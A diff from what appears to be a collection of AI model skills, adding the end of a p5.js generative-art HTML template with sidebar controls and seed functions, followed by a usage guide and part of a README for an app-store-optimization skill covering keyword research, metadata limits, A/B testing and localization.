||||||
|
|
||||||
|
.button.secondary {
|
||||||
|
background: var(--anthropic-blue);
|
||||||
|
}
|
||||||
|
|
||||||
|
.button.secondary:hover {
|
||||||
|
background: #5a8bb8;
|
||||||
|
}
|
||||||
|
|
||||||
|
.button.tertiary {
|
||||||
|
background: var(--anthropic-green);
|
||||||
|
}
|
||||||
|
|
||||||
|
.button.tertiary:hover {
|
||||||
|
background: #6b7b52;
|
||||||
|
}
|
||||||
|
|
||||||
|
.button-row {
|
||||||
|
display: flex;
|
||||||
|
gap: 8px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.button-row .button {
|
||||||
|
flex: 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Canvas Area */
|
||||||
|
.canvas-area {
|
||||||
|
flex: 1;
|
||||||
|
display: flex;
|
||||||
|
align-items: center;
|
||||||
|
justify-content: center;
|
||||||
|
min-width: 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
#canvas-container {
|
||||||
|
width: 100%;
|
||||||
|
max-width: 1000px;
|
||||||
|
border-radius: 12px;
|
||||||
|
overflow: hidden;
|
||||||
|
box-shadow: 0 20px 40px rgba(20, 20, 19, 0.1);
|
||||||
|
background: white;
|
||||||
|
}
|
||||||
|
|
||||||
|
#canvas-container canvas {
|
||||||
|
display: block;
|
||||||
|
width: 100% !important;
|
||||||
|
height: auto !important;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Loading State */
|
||||||
|
.loading {
|
||||||
|
display: flex;
|
||||||
|
align-items: center;
|
||||||
|
justify-content: center;
|
||||||
|
font-size: 18px;
|
||||||
|
color: var(--anthropic-mid-gray);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Responsive - Stack on mobile */
|
||||||
|
@media (max-width: 600px) {
|
||||||
|
.container {
|
||||||
|
flex-direction: column;
|
||||||
|
}
|
||||||
|
|
||||||
|
.sidebar {
|
||||||
|
width: 100%;
|
||||||
|
}
|
||||||
|
|
||||||
|
.canvas-area {
|
||||||
|
padding: 20px;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<div class="container">
|
||||||
|
<!-- Control Sidebar -->
|
||||||
|
<div class="sidebar">
|
||||||
|
<!-- Headers (CUSTOMIZE THIS FOR YOUR ART) -->
|
||||||
|
<h1>TITLE - EDIT</h1>
|
||||||
|
<div class="subtitle">SUBHEADER - EDIT</div>
|
||||||
|
|
||||||
|
<!-- Seed Section (ALWAYS KEEP THIS) -->
|
||||||
|
<div class="control-section">
|
||||||
|
<h3>Seed</h3>
|
||||||
|
<input type="number" id="seed-input" class="seed-input" value="12345" onchange="updateSeed()">
|
||||||
|
<div class="seed-controls">
|
||||||
|
<button class="button secondary" onclick="previousSeed()">← Prev</button>
|
||||||
|
<button class="button secondary" onclick="nextSeed()">Next →</button>
|
||||||
|
</div>
|
||||||
|
<button class="button tertiary regen-button" onclick="randomSeedAndUpdate()">↻ Random</button>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<!-- Parameters Section (CUSTOMIZE THIS FOR YOUR ART) -->
|
||||||
|
<div class="control-section">
|
||||||
|
<h3>Parameters</h3>
|
||||||
|
|
||||||
|
<!-- Particle Count -->
|
||||||
|
<div class="control-group">
|
||||||
|
<label>Particle Count</label>
|
||||||
|
<div class="slider-container">
|
||||||
|
<input type="range" id="particleCount" min="1000" max="10000" step="500" value="5000" oninput="updateParam('particleCount', this.value)">
|
||||||
|
<span class="value-display" id="particleCount-value">5000</span>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<!-- Flow Speed -->
|
||||||
|
<div class="control-group">
|
||||||
|
<label>Flow Speed</label>
|
||||||
|
<div class="slider-container">
|
||||||
|
<input type="range" id="flowSpeed" min="0.1" max="2.0" step="0.1" value="0.5" oninput="updateParam('flowSpeed', this.value)">
|
||||||
|
<span class="value-display" id="flowSpeed-value">0.5</span>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<!-- Noise Scale -->
|
||||||
|
<div class="control-group">
|
||||||
|
<label>Noise Scale</label>
|
||||||
|
<div class="slider-container">
|
||||||
|
<input type="range" id="noiseScale" min="0.001" max="0.02" step="0.001" value="0.005" oninput="updateParam('noiseScale', this.value)">
|
||||||
|
<span class="value-display" id="noiseScale-value">0.005</span>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<!-- Trail Length -->
|
||||||
|
<div class="control-group">
|
||||||
|
<label>Trail Length</label>
|
||||||
|
<div class="slider-container">
|
||||||
|
<input type="range" id="trailLength" min="2" max="20" step="1" value="8" oninput="updateParam('trailLength', this.value)">
|
||||||
|
<span class="value-display" id="trailLength-value">8</span>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<!-- Colors Section (OPTIONAL - CUSTOMIZE OR REMOVE) -->
|
||||||
|
<div class="control-section">
|
||||||
|
<h3>Colors</h3>
|
||||||
|
|
||||||
|
<!-- Color 1 -->
|
||||||
|
<div class="color-group">
|
||||||
|
<label>Primary Color</label>
|
||||||
|
<div class="color-picker-container">
|
||||||
|
<input type="color" id="color1" value="#d97757" onchange="updateColor('color1', this.value)">
|
||||||
|
<span class="color-value" id="color1-value">#d97757</span>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<!-- Color 2 -->
|
||||||
|
<div class="color-group">
|
||||||
|
<label>Secondary Color</label>
|
||||||
|
<div class="color-picker-container">
|
||||||
|
<input type="color" id="color2" value="#6a9bcc" onchange="updateColor('color2', this.value)">
|
||||||
|
<span class="color-value" id="color2-value">#6a9bcc</span>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<!-- Color 3 -->
|
||||||
|
<div class="color-group">
|
||||||
|
<label>Accent Color</label>
|
||||||
|
<div class="color-picker-container">
|
||||||
|
<input type="color" id="color3" value="#788c5d" onchange="updateColor('color3', this.value)">
|
||||||
|
<span class="color-value" id="color3-value">#788c5d</span>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<!-- Actions Section (ALWAYS KEEP THIS) -->
|
||||||
|
<div class="control-section">
|
||||||
|
<h3>Actions</h3>
|
||||||
|
<div class="button-row">
|
||||||
|
<button class="button" onclick="resetParameters()">Reset</button>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<!-- Main Canvas Area -->
|
||||||
|
<div class="canvas-area">
|
||||||
|
<div id="canvas-container">
|
||||||
|
<div class="loading">Initializing generative art...</div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
<script>
|
||||||
|
// ═══════════════════════════════════════════════════════════════════════
|
||||||
|
// GENERATIVE ART PARAMETERS - CUSTOMIZE FOR YOUR ALGORITHM
|
||||||
|
// ═══════════════════════════════════════════════════════════════════════
|
||||||
|
|
||||||
|
let params = {
|
||||||
|
seed: 12345,
|
||||||
|
particleCount: 5000,
|
||||||
|
flowSpeed: 0.5,
|
||||||
|
noiseScale: 0.005,
|
||||||
|
trailLength: 8,
|
||||||
|
colorPalette: ['#d97757', '#6a9bcc', '#788c5d']
|
||||||
|
};
|
||||||
|
|
||||||
|
let defaultParams = {...params}; // Store defaults for reset
|
||||||
|
|
||||||
|
// ═══════════════════════════════════════════════════════════════════════
|
||||||
|
// P5.JS GENERATIVE ART ALGORITHM - REPLACE WITH YOUR VISION
|
||||||
|
// ═══════════════════════════════════════════════════════════════════════
|
||||||
|
|
||||||
|
let particles = [];
|
||||||
|
let flowField = [];
|
||||||
|
let cols, rows;
|
||||||
|
let scl = 10; // Flow field resolution
|
||||||
|
|
||||||
|
function setup() {
|
||||||
|
let canvas = createCanvas(1200, 1200);
|
||||||
|
canvas.parent('canvas-container');
|
||||||
|
|
||||||
|
initializeSystem();
|
||||||
|
|
||||||
|
// Remove loading message
|
||||||
|
document.querySelector('.loading').style.display = 'none';
|
||||||
|
}
|
||||||
|
|
||||||
|
function initializeSystem() {
|
||||||
|
// Seed the randomness for reproducibility
|
||||||
|
randomSeed(params.seed);
|
||||||
|
noiseSeed(params.seed);
|
||||||
|
|
||||||
|
// Clear particles and recreate
|
||||||
|
particles = [];
|
||||||
|
|
||||||
|
// Initialize particles
|
||||||
|
for (let i = 0; i < params.particleCount; i++) {
|
||||||
|
particles.push(new Particle());
|
||||||
|
}
|
||||||
|
|
||||||
|
// Calculate flow field dimensions
|
||||||
|
cols = floor(width / scl);
|
||||||
|
rows = floor(height / scl);
|
||||||
|
|
||||||
|
// Generate flow field
|
||||||
|
generateFlowField();
|
||||||
|
|
||||||
|
// Clear background
|
||||||
|
background(250, 249, 245); // Anthropic light background
|
||||||
|
}
|
||||||
|
|
||||||
|
function generateFlowField() {
|
||||||
|
// fill this in
|
||||||
|
}
|
||||||
|
|
||||||
|
function draw() {
|
||||||
|
// fill this in
|
||||||
|
}
|
||||||
|
|
||||||
|
// ═══════════════════════════════════════════════════════════════════════
|
||||||
|
// PARTICLE SYSTEM - CUSTOMIZE FOR YOUR ALGORITHM
|
||||||
|
// ═══════════════════════════════════════════════════════════════════════
|
||||||
|
|
||||||
|
class Particle {
|
||||||
|
constructor() {
|
||||||
|
// fill this in
|
||||||
|
}
|
||||||
|
// fill this in
|
||||||
|
}
|
||||||
|
|
||||||
|
// ═══════════════════════════════════════════════════════════════════════
|
||||||
|
// UI CONTROL HANDLERS - CUSTOMIZE FOR YOUR PARAMETERS
|
||||||
|
// ═══════════════════════════════════════════════════════════════════════
|
||||||
|
|
||||||
|
function updateParam(paramName, value) {
|
||||||
|
// fill this in
|
||||||
|
}
|
||||||
|
|
||||||
|
function updateColor(colorId, value) {
|
||||||
|
// fill this in
|
||||||
|
}
|
||||||
|
|
||||||
|
// ═══════════════════════════════════════════════════════════════════════
|
||||||
|
// SEED CONTROL FUNCTIONS - ALWAYS KEEP THESE
|
||||||
|
// ═══════════════════════════════════════════════════════════════════════
|
||||||
|
|
||||||
|
function updateSeedDisplay() {
|
||||||
|
document.getElementById('seed-input').value = params.seed;
|
||||||
|
}
|
||||||
|
|
||||||
|
function updateSeed() {
|
||||||
|
let input = document.getElementById('seed-input');
|
||||||
|
let newSeed = parseInt(input.value);
|
||||||
|
if (newSeed && newSeed > 0) {
|
||||||
|
params.seed = newSeed;
|
||||||
|
initializeSystem();
|
||||||
|
} else {
|
||||||
|
// Reset to current seed if invalid
|
||||||
|
updateSeedDisplay();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function previousSeed() {
|
||||||
|
params.seed = Math.max(1, params.seed - 1);
|
||||||
|
updateSeedDisplay();
|
||||||
|
initializeSystem();
|
||||||
|
}
|
||||||
|
|
||||||
|
function nextSeed() {
|
||||||
|
params.seed = params.seed + 1;
|
||||||
|
updateSeedDisplay();
|
||||||
|
initializeSystem();
|
||||||
|
}
|
||||||
|
|
||||||
|
function randomSeedAndUpdate() {
|
||||||
|
params.seed = Math.floor(Math.random() * 999999) + 1;
|
||||||
|
updateSeedDisplay();
|
||||||
|
initializeSystem();
|
||||||
|
}
|
||||||
|
|
||||||
|
function resetParameters() {
|
||||||
|
params = {...defaultParams};
|
||||||
|
|
||||||
|
// Update UI elements
|
||||||
|
document.getElementById('particleCount').value = params.particleCount;
|
||||||
|
document.getElementById('particleCount-value').textContent = params.particleCount;
|
||||||
|
document.getElementById('flowSpeed').value = params.flowSpeed;
|
||||||
|
document.getElementById('flowSpeed-value').textContent = params.flowSpeed;
|
||||||
|
document.getElementById('noiseScale').value = params.noiseScale;
|
||||||
|
document.getElementById('noiseScale-value').textContent = params.noiseScale;
|
||||||
|
document.getElementById('trailLength').value = params.trailLength;
|
||||||
|
document.getElementById('trailLength-value').textContent = params.trailLength;
|
||||||
|
|
||||||
|
// Reset colors
|
||||||
|
document.getElementById('color1').value = params.colorPalette[0];
|
||||||
|
document.getElementById('color1-value').textContent = params.colorPalette[0];
|
||||||
|
document.getElementById('color2').value = params.colorPalette[1];
|
||||||
|
document.getElementById('color2-value').textContent = params.colorPalette[1];
|
||||||
|
document.getElementById('color3').value = params.colorPalette[2];
|
||||||
|
document.getElementById('color3-value').textContent = params.colorPalette[2];
|
||||||
|
|
||||||
|
updateSeedDisplay();
|
||||||
|
initializeSystem();
|
||||||
|
}
|
||||||
|
|
||||||
|
// Initialize UI on load
|
||||||
|
window.addEventListener('load', function() {
|
||||||
|
updateSeedDisplay();
|
||||||
|
});
|
||||||
|
</script>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
281
skills/app-store-optimization/HOW_TO_USE.md
Normal file
281
skills/app-store-optimization/HOW_TO_USE.md
Normal file
@@ -0,0 +1,281 @@
|
|||||||
|
# How to Use the App Store Optimization Skill
|
||||||
|
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you help me optimize my app's presence on the App Store and Google Play?
|
||||||
|
|
||||||
|
## Example Invocations
|
||||||
|
|
||||||
|
### Keyword Research
|
||||||
|
|
||||||
|
**Example 1: Basic Keyword Research**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you research the best keywords for my productivity app? I'm targeting professionals who need task management and team collaboration features.
|
||||||
|
```
|
||||||
|
|
||||||
|
**Example 2: Competitive Keyword Analysis**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze keywords that Todoist, Asana, and Monday.com are using? I want to find gaps and opportunities for my project management app.
|
||||||
|
```
|
||||||
|
|
||||||
|
### Metadata Optimization
|
||||||
|
|
||||||
|
**Example 3: Optimize App Title**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you optimize my app title for the Apple App Store? My app is called "TaskFlow" and I want to rank for "task manager", "productivity", and "team collaboration". The title needs to be under 30 characters.
|
||||||
|
```
|
||||||
|
|
||||||
|
**Example 4: Full Metadata Package**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you create optimized metadata for both Apple App Store and Google Play Store? Here's my app info:
|
||||||
|
- Name: TaskFlow
|
||||||
|
- Category: Productivity
|
||||||
|
- Key features: AI task prioritization, team collaboration, calendar integration
|
||||||
|
- Target keywords: task manager, productivity app, team tasks
|
||||||
|
```
|
||||||
|
|
||||||
|
### Competitor Analysis
|
||||||
|
|
||||||
|
**Example 5: Analyze Top Competitors**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze the ASO strategies of the top 5 productivity apps in the App Store? I want to understand their title strategies, keyword usage, and visual asset approaches.
|
||||||
|
```
|
||||||
|
|
||||||
|
**Example 6: Identify Competitive Gaps**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you compare my app's ASO performance against competitors and identify what I'm missing? Here's my current metadata: [paste metadata]
|
||||||
|
```
|
||||||
|
|
||||||
|
### ASO Score Calculation
|
||||||
|
|
||||||
|
**Example 7: Calculate Overall ASO Health**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you calculate my app's ASO health score? Here are my metrics:
|
||||||
|
- Average rating: 4.2 stars
|
||||||
|
- Total ratings: 3,500
|
||||||
|
- Keywords in top 10: 3
|
||||||
|
- Keywords in top 50: 12
|
||||||
|
- Conversion rate: 4.5%
|
||||||
|
```
|
||||||
|
|
||||||
|
**Example 8: Identify Improvement Areas**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. My ASO score is 62/100. Can you tell me which areas I should focus on first to improve my rankings and downloads?
|
||||||
|
```
|
||||||
|
|
||||||
|
### A/B Testing
|
||||||
|
|
||||||
|
**Example 9: Plan Icon Test**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. I want to A/B test two different app icons. My current conversion rate is 5%. Can you help me plan the test, calculate required sample size, and determine how long to run it?
|
||||||
|
```
|
||||||
|
|
||||||
|
**Example 10: Analyze Test Results**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze my A/B test results?
|
||||||
|
- Variant A (control): 2,500 visitors, 125 installs
|
||||||
|
- Variant B (new icon): 2,500 visitors, 150 installs
|
||||||
|
Is this statistically significant? Should I implement variant B?
|
||||||
|
```
|
||||||
|
|
||||||
|
### Localization
|
||||||
|
|
||||||
|
**Example 11: Plan Localization Strategy**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. I currently only have English metadata. Which markets should I localize for first? I'm a bootstrapped startup with moderate budget.
|
||||||
|
```
|
||||||
|
|
||||||
|
**Example 12: Translate Metadata**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you help me translate my app metadata to Spanish for the Mexico market? Here's my English metadata: [paste metadata]. Check if it fits within character limits.
|
||||||
|
```
|
||||||
|
|
||||||
|
### Review Analysis
|
||||||
|
|
||||||
|
**Example 13: Analyze User Reviews**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze my recent reviews and tell me:
|
||||||
|
- Overall sentiment (positive/negative ratio)
|
||||||
|
- Most common complaints
|
||||||
|
- Most requested features
|
||||||
|
- Bugs that need immediate fixing
|
||||||
|
```
|
||||||
|
|
||||||
|
**Example 14: Generate Review Response Templates**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you create professional response templates for:
|
||||||
|
- Users reporting crashes
|
||||||
|
- Feature requests
|
||||||
|
- Positive 5-star reviews
|
||||||
|
- General complaints
|
||||||
|
```
|
||||||
|
|
||||||
|
### Launch Planning
|
||||||
|
|
||||||
|
**Example 15: Pre-Launch Checklist**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you generate a comprehensive pre-launch checklist for both Apple App Store and Google Play Store? My launch date is December 1, 2025.
|
||||||
|
```
|
||||||
|
|
||||||
|
**Example 16: Optimize Launch Timing**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. What's the best day and time to launch my fitness app? I want to maximize visibility and downloads in the first week.
|
||||||
|
```
|
||||||
|
|
||||||
|
**Example 17: Plan Seasonal Campaign**
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you identify seasonal opportunities for my fitness app? It's currently October—what campaigns should I run for the next 6 months?
|
||||||
|
```
|
||||||
|
|
||||||
|
## What to Provide
|
||||||
|
|
||||||
|
### For Keyword Research
|
||||||
|
- App name and category
|
||||||
|
- Target audience description
|
||||||
|
- Key features and unique value proposition
|
||||||
|
- Competitor apps (optional)
|
||||||
|
- Geographic markets to target
|
||||||
|
|
||||||
|
### For Metadata Optimization
|
||||||
|
- Current app name
|
||||||
|
- Platform (Apple, Google, or both)
|
||||||
|
- Target keywords (prioritized list)
|
||||||
|
- Key features and benefits
|
||||||
|
- Target audience
|
||||||
|
- Current metadata (for optimization)
|
||||||
|
|
||||||
|
### For Competitor Analysis
|
||||||
|
- Your app category
|
||||||
|
- List of competitor app names or IDs
|
||||||
|
- Platform (Apple or Google)
|
||||||
|
- Specific aspects to analyze (keywords, visuals, ratings)
|
||||||
|
|
||||||
|
### For ASO Score Calculation
|
||||||
|
- Metadata quality metrics (title length, description length, keyword density)
|
||||||
|
- Rating data (average rating, total ratings, recent ratings)
|
||||||
|
- Keyword rankings (top 10, top 50, top 100 counts)
|
||||||
|
- Conversion metrics (impression-to-install rate, downloads)
|
||||||
|
|
||||||
|
### For A/B Testing
|
||||||
|
- Test type (icon, screenshot, title, description)
|
||||||
|
- Control variant details
|
||||||
|
- Test variant details
|
||||||
|
- Baseline conversion rate
|
||||||
|
- For results analysis: visitor and conversion counts for both variants
|
||||||
|
|
||||||
|
### For Localization
|
||||||
|
- Current market and language
|
||||||
|
- Budget level (low, medium, high)
|
||||||
|
- Target number of markets
|
||||||
|
- Current metadata text for translation
|
||||||
|
|
||||||
|
### For Review Analysis
|
||||||
|
- Recent reviews (text, rating, date)
|
||||||
|
- Platform (Apple or Google)
|
||||||
|
- Time period to analyze
|
||||||
|
- Specific focus (bugs, features, sentiment)
|
||||||
|
|
||||||
|
### For Launch Planning
|
||||||
|
- Platform (Apple, Google, or both)
|
||||||
|
- Target launch date
|
||||||
|
- App category
|
||||||
|
- App information (name, features, target audience)
|
||||||
|
|
||||||
|
## What You'll Get
|
||||||
|
|
||||||
|
### Keyword Research Output
|
||||||
|
- Prioritized keyword list with search volume estimates
|
||||||
|
- Competition level analysis
|
||||||
|
- Relevance scores
|
||||||
|
- Long-tail keyword opportunities
|
||||||
|
- Strategic recommendations
|
||||||
|
|
||||||
|
### Metadata Optimization Output
|
||||||
|
- Optimized titles (multiple options)
|
||||||
|
- Optimized descriptions (short and full)
|
||||||
|
- Keyword field optimization (Apple)
|
||||||
|
- Character count validation
|
||||||
|
- Keyword density analysis
|
||||||
|
- Before/after comparison
|
||||||
|
|
||||||
|
### Competitor Analysis Output
|
||||||
|
- Ranked competitors by ASO strength
|
||||||
|
- Common keyword patterns
|
||||||
|
- Keyword gaps and opportunities
|
||||||
|
- Visual asset assessment
|
||||||
|
- Best practices identified
|
||||||
|
- Actionable recommendations
|
||||||
|
|
||||||
|
### ASO Score Output
|
||||||
|
- Overall score (0-100)
|
||||||
|
- Breakdown by category (metadata, ratings, keywords, conversion)
|
||||||
|
- Strengths and weaknesses
|
||||||
|
- Prioritized action items
|
||||||
|
- Expected impact of improvements
|
||||||
|
|
||||||
|
### A/B Test Output
|
||||||
|
- Test design with hypothesis
|
||||||
|
- Required sample size calculation
|
||||||
|
- Duration estimates
|
||||||
|
- Statistical significance analysis
|
||||||
|
- Implementation recommendations
|
||||||
|
- Learnings and insights
|
||||||
|
|
||||||
|
### Localization Output
|
||||||
|
- Prioritized target markets
|
||||||
|
- Estimated translation costs
|
||||||
|
- ROI projections
|
||||||
|
- Character limit validation for each language
|
||||||
|
- Cultural adaptation recommendations
|
||||||
|
- Phased implementation plan
|
||||||
|
|
||||||
|
### Review Analysis Output
|
||||||
|
- Sentiment distribution (positive/neutral/negative)
|
||||||
|
- Common themes and topics
|
||||||
|
- Top issues requiring fixes
|
||||||
|
- Most requested features
|
||||||
|
- Response templates
|
||||||
|
- Trend analysis over time
|
||||||
|
|
||||||
|
### Launch Planning Output
|
||||||
|
- Platform-specific checklists (Apple, Google, Universal)
|
||||||
|
- Timeline with milestones
|
||||||
|
- Compliance validation
|
||||||
|
- Optimal launch timing recommendations
|
||||||
|
- Seasonal campaign opportunities
|
||||||
|
- Update cadence planning
|
||||||
|
|
||||||
|
## Tips for Best Results
|
||||||
|
|
||||||
|
1. **Be Specific**: Provide as much detail about your app as possible
|
||||||
|
2. **Include Context**: Share your goals (increase downloads, improve ranking, boost conversion)
|
||||||
|
3. **Provide Data**: Real metrics enable more accurate analysis
|
||||||
|
4. **Iterate**: Start with keyword research, then optimize metadata, then test
|
||||||
|
5. **Track Results**: Monitor changes after implementing recommendations
|
||||||
|
6. **Stay Compliant**: Always verify recommendations against current App Store/Play Store guidelines
|
||||||
|
7. **Test First**: Use A/B testing before making major metadata changes
|
||||||
|
8. **Localize Strategically**: Start with highest-ROI markets first
|
||||||
|
9. **Respond to Reviews**: Use provided templates to engage with users
|
||||||
|
10. **Plan Ahead**: Use launch checklists and timelines to avoid last-minute rushes
|
||||||
|
|
||||||
|
## Common Workflows
|
||||||
|
|
||||||
|
### New App Launch
|
||||||
|
1. Keyword research → Competitor analysis → Metadata optimization → Pre-launch checklist → Launch timing optimization
|
||||||
|
|
||||||
|
### Improving Existing App
|
||||||
|
1. ASO score calculation → Identify gaps → Metadata optimization → A/B testing → Review analysis → Implement changes
|
||||||
|
|
||||||
|
### International Expansion
|
||||||
|
1. Localization planning → Market prioritization → Metadata translation → ROI analysis → Phased rollout
|
||||||
|
|
||||||
|
### Ongoing Optimization
|
||||||
|
1. Monthly keyword ranking tracking → Quarterly metadata updates → Continuous A/B testing → Review monitoring → Seasonal campaigns
|
||||||
|
|
||||||
|
## Need Help?
|
||||||
|
|
||||||
|
If you need clarification on any aspect of ASO or want to combine multiple analyses, just ask! For example:
|
||||||
|
|
||||||
|
```
|
||||||
|
Hey Claude—I just added the "app-store-optimization" skill. Can you create a complete ASO strategy for my new productivity app? I need keyword research, optimized metadata for both stores, a pre-launch checklist, and launch timing recommendations.
|
||||||
|
```
|
||||||
|
|
||||||
|
The skill can handle comprehensive, multi-phase ASO projects as well as specific tactical optimizations.
|
||||||
430
skills/app-store-optimization/README.md
Normal file
430
skills/app-store-optimization/README.md
Normal file
@@ -0,0 +1,430 @@
|
|||||||
|
# App Store Optimization (ASO) Skill
|
||||||
|
|
||||||
|
**Version**: 1.0.0
|
||||||
|
**Last Updated**: November 7, 2025
|
||||||
|
**Author**: Claude Skills Factory
|
||||||
|
|
||||||
|
## Overview
|
||||||
|
|
||||||
|
A comprehensive App Store Optimization (ASO) skill that provides complete capabilities for researching, optimizing, and tracking mobile app performance on the Apple App Store and Google Play Store. This skill empowers app developers and marketers to maximize their app's visibility, downloads, and success in competitive app marketplaces.
|
||||||
|
|
||||||
|
## What This Skill Does
|
||||||
|
|
||||||
|
This skill provides end-to-end ASO capabilities across seven key areas:
|
||||||
|
|
||||||
|
1. **Research & Analysis**: Keyword research, competitor analysis, market trends, review sentiment
|
||||||
|
2. **Metadata Optimization**: Title, description, keywords with platform-specific character limits
|
||||||
|
3. **Conversion Optimization**: A/B testing framework, visual asset optimization
|
||||||
|
4. **Rating & Review Management**: Sentiment analysis, response strategies, issue identification
|
||||||
|
5. **Launch & Update Strategies**: Pre-launch checklists, timing optimization, update planning
|
||||||
|
6. **Analytics & Tracking**: ASO scoring, keyword rankings, performance benchmarking
|
||||||
|
7. **Localization**: Multi-language strategy, translation management, ROI analysis
|
||||||
|
|
||||||
|
## Key Features
|
||||||
|
|
||||||
|
### Comprehensive Keyword Research
|
||||||
|
- Search volume and competition analysis
|
||||||
|
- Long-tail keyword discovery
|
||||||
|
- Competitor keyword extraction
|
||||||
|
- Keyword difficulty scoring
|
||||||
|
- Strategic prioritization
|
||||||
|
|
||||||
|
### Platform-Specific Metadata Optimization
|
||||||
|
- **Apple App Store**:
|
||||||
|
- Title (30 chars)
|
||||||
|
- Subtitle (30 chars)
|
||||||
|
- Promotional Text (170 chars)
|
||||||
|
- Description (4000 chars)
|
||||||
|
- Keywords field (100 chars)
|
||||||
|
- **Google Play Store**:
|
||||||
|
- Title (50 chars)
|
||||||
|
- Short Description (80 chars)
|
||||||
|
- Full Description (4000 chars)
|
||||||
|
- Character limit validation
|
||||||
|
- Keyword density analysis
|
||||||
|
- Multiple optimization strategies
|
||||||
|
|
||||||
|
### Competitor Intelligence
|
||||||
|
- Automated competitor discovery
|
||||||
|
- Metadata strategy analysis
|
||||||
|
- Visual asset assessment
|
||||||
|
- Gap identification
|
||||||
|
- Competitive positioning
|
||||||
|
|
||||||
|
### ASO Health Scoring
|
||||||
|
- 0-100 overall score
|
||||||
|
- Four-category breakdown (Metadata, Ratings, Keywords, Conversion)
|
||||||
|
- Strengths and weaknesses identification
|
||||||
|
- Prioritized action recommendations
|
||||||
|
- Expected impact estimates
|
||||||
|
|
||||||
|
### Scientific A/B Testing
|
||||||
|
- Test design and hypothesis formulation
|
||||||
|
- Sample size calculation
|
||||||
|
- Statistical significance analysis
|
||||||
|
- Duration estimation
|
||||||
|
- Implementation recommendations
|
||||||
|
|
||||||
|
### Global Localization
|
||||||
|
- Market prioritization (Tier 1/2/3)
|
||||||
|
- Translation cost estimation
|
||||||
|
- Character limit adaptation by language
|
||||||
|
- Cultural keyword considerations
|
||||||
|
- ROI analysis
|
||||||
|
|
||||||
|
### Review Intelligence
|
||||||
|
- Sentiment analysis
|
||||||
|
- Common theme extraction
|
||||||
|
- Bug and issue identification
|
||||||
|
- Feature request clustering
|
||||||
|
- Professional response templates
|
||||||
|
|
||||||
|
### Launch Planning
|
||||||
|
- Platform-specific checklists
|
||||||
|
- Timeline generation
|
||||||
|
- Compliance validation
|
||||||
|
- Optimal timing recommendations
|
||||||
|
- Seasonal campaign planning
|
||||||
|
|
||||||
|
## Python Modules
|
||||||
|
|
||||||
|
This skill includes 8 powerful Python modules:
|
||||||
|
|
||||||
|
### 1. keyword_analyzer.py
|
||||||
|
**Purpose**: Analyzes keywords for search volume, competition, and relevance
|
||||||
|
|
||||||
|
**Key Functions**:
|
||||||
|
- `analyze_keyword()`: Single keyword analysis
|
||||||
|
- `compare_keywords()`: Multi-keyword comparison and ranking
|
||||||
|
- `find_long_tail_opportunities()`: Generate long-tail variations
|
||||||
|
- `calculate_keyword_density()`: Analyze keyword usage in text
|
||||||
|
- `extract_keywords_from_text()`: Extract keywords from reviews/descriptions
|
||||||
|
|
||||||
|
### 2. metadata_optimizer.py
|
||||||
|
**Purpose**: Optimizes titles, descriptions, keywords with character limit validation
|
||||||
|
|
||||||
|
**Key Functions**:
|
||||||
|
- `optimize_title()`: Generate optimal title options
|
||||||
|
- `optimize_description()`: Create conversion-focused descriptions
|
||||||
|
- `optimize_keyword_field()`: Maximize Apple's 100-char keyword field
|
||||||
|
- `validate_character_limits()`: Ensure platform compliance
|
||||||
|
- `calculate_keyword_density()`: Analyze keyword integration
|
||||||
|
|
||||||
|
### 3. competitor_analyzer.py
|
||||||
|
**Purpose**: Analyzes competitor ASO strategies
|
||||||
|
|
||||||
|
**Key Functions**:
|
||||||
|
- `analyze_competitor()`: Single competitor deep-dive
|
||||||
|
- `compare_competitors()`: Multi-competitor analysis
|
||||||
|
- `identify_gaps()`: Find competitive opportunities
|
||||||
|
